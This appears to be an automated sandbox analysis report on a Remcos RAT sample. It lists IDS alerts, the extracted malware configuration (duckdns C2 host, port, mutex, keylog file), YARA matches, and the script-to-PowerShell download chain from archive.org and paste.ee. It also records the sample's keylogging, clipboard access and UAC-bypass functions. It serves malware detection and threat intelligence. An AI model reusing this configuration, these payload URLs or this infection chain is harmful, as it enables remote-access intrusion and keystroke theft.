            2024-09-26T10:59:07.851896+020020327761Malware Command and Control Activity Detected192.168.2.652112181.236.206.32404TCP
            2024-09-26T10:59:20.958757+020020327761Malware Command and Control Activity Detected192.168.2.652113181.236.206.32404TCP
            2024-09-26T10:59:23.572392+020020327761Malware Command and Control Activity Detected192.168.2.652114181.236.206.32404TCP
            2024-09-26T10:59:26.214181+020020327761Malware Command and Control Activity Detected192.168.2.652115181.236.206.32404TCP
            2024-09-26T10:59:28.854186+020020327761Malware Command and Control Activity Detected192.168.2.652116181.236.206.32404TCP
            2024-09-26T10:59:31.526186+020020327761Malware Command and Control Activity Detected192.168.2.652117181.236.206.32404TCP
            2024-09-26T10:59:34.132700+020020327761Malware Command and Control Activity Detected192.168.2.652119181.236.206.32404TCP
            2024-09-26T10:59:36.773249+020020327761Malware Command and Control Activity Detected192.168.2.652120181.236.206.32404TCP
            2024-09-26T10:59:39.460610+020020327761Malware Command and Control Activity Detected192.168.2.652121181.236.206.32404TCP
            2024-09-26T10:59:42.104552+020020327761Malware Command and Control Activity Detected192.168.2.652122181.236.206.32404TCP
            2024-09-26T10:59:44.711300+020020327761Malware Command and Control Activity Detected192.168.2.652123181.236.206.32404TCP
            2024-09-26T10:59:47.322623+020020327761Malware Command and Control Activity Detected192.168.2.652124181.236.206.32404TCP
            2024-09-26T10:59:49.853288+020020327761Malware Command and Control Activity Detected192.168.2.652125181.236.206.32404TCP
            2024-09-26T10:59:52.402234+020020327761Malware Command and Control Activity Detected192.168.2.652126181.236.206.32404TCP
            2024-09-26T10:59:54.930365+020020327761Malware Command and Control Activity Detected192.168.2.652127181.236.206.32404TCP
            2024-09-26T10:59:57.386279+020020327761Malware Command and Control Activity Detected192.168.2.652128181.236.206.32404TCP
            2024-09-26T10:59:59.806269+020020327761Malware Command and Control Activity Detected192.168.2.652129181.236.206.32404TCP
            2024-09-26T11:00:02.198263+020020327761Malware Command and Control Activity Detected192.168.2.652130181.236.206.32404TCP
            2024-09-26T11:00:04.601059+020020327761Malware Command and Control Activity Detected192.168.2.652131181.236.206.32404TCP
            2024-09-26T11:00:06.976502+020020327761Malware Command and Control Activity Detected192.168.2.652132181.236.206.32404TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T10:58:07.123709+020028410751Malware Command and Control Activity Detected192.168.2.649712188.114.97.3443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtAvira URL Cloud: Label: malware
            Source: newssssssssssssss.duckdns.orgAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "newssssssssssssss.duckdns.org:2404:0", "Assigned name": "Matrix Fenix*", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-XDNGQ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Yara detected Remcos RAT
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_00433837
            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_35ef43af-6

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR

            Privilege Escalation

            barindex
            Contains functionality to bypass UAC (CMSTPLUA)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004074FD _wcslen,CoGetObject,7_2_004074FD
            Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A0747000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0044E879 FindFirstFileExA,7_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040783C FindFirstFileW,FindNextFileW,7_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00407C97

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49713 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49716 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49715 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49720 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49722 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49727 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49728 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49732 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49725 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52103 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49730 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49729 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52106 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52104 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52108 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52107 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52109 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52112 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52102 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49726 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52113 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52114 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52117 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52115 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52111 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52122 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52121 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52119 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52126 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52120 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52124 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52127 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52130 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52132 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52129 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52123 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52131 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52125 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52128 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49724 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52105 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52116 -> 181.236.206.3:2404
            Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49712 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.97.3:443 -> 192.168.2.6:49712
            Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.97.3:443 -> 192.168.2.6:49712
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: newssssssssssssss.duckdns.org
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: paste.ee
            Uses dynamic DNS services
            Source: unknownDNS query: name: newssssssssssssss.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.6:49713 -> 181.236.206.3:2404
            Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/WksSo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: TELEBUCARAMANGASAESPCO TELEBUCARAMANGASAESPCO
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_00404B96 WaitForSingleObject,SetEvent,recv,7_2_00404B96
            Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/WksSo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: newssssssssssssss.duckdns.org
            Source: AddInProcess32.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2311160926.000001FE959C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2311160926.000001FE9597A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2311160926.000001FE95994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B08F731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.2253846406.000001B0907A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arX
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08F953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtc9I;k8fbase64Content
            Source: powershell.exe, 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2253846406.000001B091070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000004.00000002.2253846406.000001B090E77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FB8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FB8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/WksSo/0
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: powershell.exe, 00000004.00000002.2253846406.000001B08FD43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000007_2_0040A2B8
            Installs a global keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,7_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004168C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,7_2_0040B70E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,7_2_0040A3E0

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.1b0a0c46998.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3412298502.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B09F79E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2268054152.000001B0A07E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 4188, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Contains functionalty to change the wallpaper
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 7_2_0041C9E2 SystemParametersInfoW,7_2_0041C9E2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
